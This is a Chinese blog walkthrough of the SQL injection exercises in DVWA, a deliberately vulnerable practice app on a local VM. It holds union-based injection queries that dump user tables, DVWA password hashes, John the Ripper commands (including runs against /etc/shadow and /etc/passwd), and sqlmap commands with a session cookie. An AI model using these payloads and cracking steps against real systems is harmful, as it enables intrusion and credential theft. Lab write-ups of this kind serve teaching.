DVWA实践: SQL Injection (3 LEVEL) (sqlmap攻破+john解析)

最新推荐文章于 2024-06-03 17:36:29 发布
最新推荐文章于 2024-06-03 17:36:29 发布
阅读量484 收藏
点赞数
分类专栏: Kali Mysql DVWA 文章标签: DVWA Web安全 DVWA Kali Linux 渗透测试 sqlmap John the Ripper使用方法概述
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaohujiang/article/details/107219539
版权
Kali 同时被 3 个专栏收录
4 篇文章 0 订阅
订阅专栏
Mysql
1 篇文章 0 订阅
订阅专栏
DVWA
1 篇文章 0 订阅
订阅专栏

准备工作

  1. 在VirtureBox安装DVWA虚拟机(基于msf)
  2. 准备一台同局域网的KALI Linux
  3. 键盘

Session 1:手动sql注入(DVWA security level low)

<?php    
if(isset($_GET['Submit'])){
    // Retrieve data
    $id = $_GET['id'];
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
    $num = mysql_numrows($result);
    $i = 0;
    while ($i < $num) {
        $first = mysql_result($result,$i,"first_name");
        $last = mysql_result($result,$i,"last_name");
        echo '<pre>';
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
        echo '</pre>';
        $i++;
    }
}
?>

//遍历数据库
SELECT first_name, last_name FROM users WHERE user_id = '1' or '1=1'
SELECT first_name, last_name FROM users WHERE user_id = '1' union select 1,database()# 
#是注释作用
SELECT first_name, last_name FROM users WHERE user_id = '1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#
SELECT first_name, last_name FROM users WHERE user_id = '1' union select 1,column_name from information_schema.columns where table_name='users'#
SELECT first_name, last_name FROM users WHERE user_id = '1' union select 1,concat(user,password) from users#
SELECT first_name, last_name FROM users WHERE user_id = '1' union select 1,group_concat(user,password) from users#
SELECT first_name, last_name FROM users WHERE user_id = '1' union select 1,concat_ws(char(32,58,32),user,password) from users#

破解hash密码

新建密码文件password,写入以下内容:

admin:5f4dcc3b5aa765d61d8327deb882cf99
gordonb:e99a18c428cb38d5f260853678922e03
1337:8d3533d75ae2c3966d7e0d4fcc69216b
pablo:0d107d09f5bbe40cade3de5c71e9e9b7
smithy:5f4dcc3b5aa765d61d8327deb882cf99

使用md5格式破解:
john --format=raw-md5 password
破解之后看已破解密码输入:
john --show --format=raw-md5 password
在这里插入图片描述
字典法破解Linux用户密码:
john --wordlist=/usr/share/john/password.lst /etc/shadow
john --wordlist=/usr/share/john/password.lst /etc/passwd
在这里插入图片描述

sqlmap自动破解

sqlmap -u “http://172.16.60.233/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”
sqlmap -u “http://172.16.60.233/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“PHPSESSID=v1d47lav6lot63v45vif84lren;security=low”
sqlmap -u “http://172.16.60.233/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“PHPSESSID=v1d47lav6lot63v45vif84lren;security=low” -D dvwa -T users -C user,password --dump

在这里插入图片描述

Session 2: 手动sql注入(DVWA security level medium)

首先声明下,sqlmap可以直接破解medium等级,步骤同session 1,这里使用手动注入是为了更清楚原理。

<?php
if (isset($_GET['Submit'])) {
    // Retrieve data
    $id = $_GET['id'];
    $id = mysql_real_escape_string($id);
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );    
    $num = mysql_numrows($result);
    $i=0;
    while ($i < $num) {
        $first = mysql_result($result,$i,"first_name");
        $last = mysql_result($result,$i,"last_name");        
        echo '<pre>';
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
        echo '</pre>';
        $i++;
    }
}
?>

在这里插入图片描述

1、 输入1’or 1=1 # ,发现’被转义成\’
2、 输入1 or 1=1 #打印全部用户,存在数字注入

//遍历数据库
SELECT first_name, last_name FROM users WHERE user_id = 1 or 1=1
//打印数据库
SELECT first_name, last_name FROM users WHERE user_id = 1 union select 1,database()#

在这里插入图片描述

//打印table,字符串转16进制
SELECT first_name, last_name FROM users WHERE user_id = 1 union select 1,table_name from information_schema.tables where table_schema=(select database())#
SELECT first_name, last_name FROM users WHERE user_id=1 union select 1, table_name from information_schema.tables where table_schema=0x64767761 #

在这里插入图片描述

//打印COLUMN,字符串转16进制
SELECT first_name, last_name FROM users WHERE user_id =1 union select 1,column_name from information_schema.columns where table_name=0x7573657273#

在这里插入图片描述

//打印user,password
SELECT first_name, last_name FROM users WHERE user_id =1 union select user,password from users #
SELECT first_name, last_name FROM users WHERE user_id = 1 union select 1,concat(user,password) from users#
SELECT first_name, last_name FROM users WHERE user_id = 1 union select 1,group_concat(user,password) from users#
SELECT first_name, last_name FROM users WHERE user_id = 1 union select 1,concat_ws(char(32,58,32),user,password) from users#

在这里插入图片描述

Session 3: 手动sql注入(DVWA security level high)

<?php    

if (isset($_GET['Submit'])) {
    // Retrieve data
    $id = $_GET['id'];
    $id = stripslashes($id);
   $id = mysql_real_escape_string($id);
    if (is_numeric($id)){
        $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
        $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
        $num = mysql_numrows($result);
        $i=0;
        while ($i < $num) {
            $first = mysql_result($result,$i,"first_name");
            $last = mysql_result($result,$i,"last_name");            
            echo '<pre>';
            echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
            echo '</pre>';
            $i++;
        }
    }
}
?>

高等级暂未完成注入,可以按照以下思路尝试!若破解成功,望不吝赐教,谢谢!
在这里插入图片描述

Phishingman
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用sqlmap+burpsuite进行中级sql注入
06-01
使用sqlmap+burpsuite进行中级sql注入,亲测可行
DVWA靶场分析笔记
RestoreJustice的博客
03-16 829
用户登录后,在服务器就会创建一个会话(session),叫做会话控制,接着访问页面的时候就不用登录,只需要携带Sesion去访问,是用户的身份令牌。sessionID作为特定用户访问站点所需要的唯一内容。如果能够计算或轻易猜到该sessionID,则攻击者将可以轻易获取访问限,无需录直接进入特定用户界面,进而进行其他操作。用户访问服务器的时候,在服务器端会创建一个新的会话(Session),会话中会保存用户的状态和相关信息,用于标识用户。
渗透测试--5.3.使用john破解密码
我是个好人呀,????
05-17 3372
John the Ripper一款免费、开源的暴力密码破解器,它有多平台版本,支持目前大多数的加密算法,如DES、MD4、MD5等。该软件破解密码方式简单而粗暴,理论上只要时间上面允许,该软件可以破译绝大多数用户密码。John the Ripper免费的开源软件,支持目前大多数的加密算法,如DES、MD4、MD5等。它支持多种不同类型的系统架构,包括Unix、Linux、Windows、DOS模式、BeOS和OpenVMS,主要目的是破解不够牢固的Unix/Linux系统密码。
sql注入 (运用sqlmap解题)
最新发布
Z11762的博客
06-03 1972
注:level参数使用–batch参数可指定payload测试复杂等级。共有五个级别,从1-5,默认值为1。等级越高,测试的payload越复杂,当使用默认等级注入不出来时,可以尝试使用level来提高测试等级。--level参数决定了 sqlmap 在检测 SQL 注入时的 “努力程度”。
sqlmap入门实践
知足且坚定,温柔且上进
03-09 283
1.判断是否存在注入: 假设目标注入点是http://127.0.0.1/Sqli_Edited_Version-master/sqlilabs/Less-1/?id=1,判断其是否存在注入的命令如下所示: python sqlmap.py -u http://127.0.0.1/Sqli_Edited_Version-master/sqlilabs/Less-1/?id=1 结果如下: 2....
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4695
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
SQL 布尔盲注
qq_42378173的博客
10-11 1213
SQL 布尔盲注
DVWA下的SQL Injection(Blind)
07-25
盲注
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
DVWA:该死的易受攻击的Web应用程序(DVWA
05-10
DVWA的目的是通过简单易用的界面来实践一些最常见的Web漏洞,这些漏洞具有不同的难度。 请注意,此软件同时存在已记录和未记录的漏洞。 这是故意的。 鼓励您尝试发现尽可能多的问题。 警告! 该死的易受攻击的Web...
DVWA:该死的易受攻击的Web应用程序(DVWA
02-05
DVWA的目的是通过简单易用的界面来实践一些最常见的Web漏洞,这些漏洞具有不同的难度。 请注意,此软件同时存在已记录和未记录的漏洞。 这是故意的。 鼓励您尝试发现尽可能多的问题。警告! 该死的漏洞Web应用程序...
DVWA全级别教程
10-26
DVWA全级别教程 通关秘籍 练手的同学可以下载 epub文件 适合手机平板看
DVWA靶场通关之SQL Injection
sunxueer的博客
07-19 1047
SQL Injection 以下ip均为dwva靶场的ip地址,这里我搭建在虚拟机win2008中 一. low 1. 求闭合字符 输入1 1' and 1=1 # 可能存在单引号sql注入 2. 求列数 1' and 1=1 order by 2# 1' and 1=1 order by 3# 说明有两列 3. 求显示位 1' and 1=2 union select 1,2 # 4. 爆数据名 1' and 1=2 union select 1,database()
John密码破解姿势
weixin_51725318的博客
09-12 3011
John密码破解姿势
sqlmap进阶
洋洋的小黑屋
05-10 414
level [1,2,3,4,5]:探测等级 level 2:或测试cookie,进行自动破解 level3:测试HTTP User-Agent,Referer等头部信息 –is-dba:验证当前用户是否为管理员权限 若为管理员,则结果为Ture;反之则为False –referer:HTTP Referer头 当level为3或大于3时,会尝试referer注入,可以使用–referer伪造HTTP中的Referer,如: –referer http://www.baidu.com 参数:–os-cmd
DVWA平台搭建+SQL注入实验详解
Karka_的博客
08-15 4900
最终目的:得到爆破数据库,得到数据库中的用户名和密码,过程:1)查看页面的传递方式2)判断是否存在注入,注入类型是什么3)猜解SQL 查询语句中的字段数4)获取当前数据库名和基本信息5)获取数据库中的表名6)获取表中的字段名7)爆破关键字段的内容(用户名、密码)
00-Sqlmap认识
南淮北安的博客
01-01 427
sqlmap支持五种不同的注入模式: a.基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 b.基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 c.基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 d.联合查询注入,可以使用union的情况下的注入。 e.堆查询注入,可以同时执行...
sqlmap帮助文档(配合实践翻译)
giantbranch的专栏
09-23 5090
本文链接:http://blog.csdn.net/u012763794/article/details/52638931 用过sqlmap,也用过不少功能了,为了更加了解这个工具,决定翻译一下,利用自己的实战经验去翻译 翻译确实有点辛苦,有些选项还实践不了,但是收获还是很多的 不惜感叹:sqlmap真强大啊~~~~~~~~ _
sqlmap一次实战
suancai1993的博客
09-11 1877
这是墨者学院一个SQL注入漏洞靶场:http://219.153.49.228:49835/show.php?id=MQo= 【目的是寻找key】 【想练习的可以去墨者学院–>在线靶场–>web安全–>sql注入–>sql注入实战-MySQL】 不启动靶场进不去这个链接 进入网站提示的信息如下图所示: 从这个网页提示信息我们也可以窥视出一些东西: 它使用的数据库类...
e-1-6-通过sqlnamp检测sql注入漏洞-随堂笔记 .doc
10-23
“通过sqlnamp检测sql注入漏洞的随堂笔记,包括安装SQLmapDVWA,以及SQL注入的概述SQLmap的介绍。” 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过在Web应用的输入字段中插入恶意SQL代码,来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值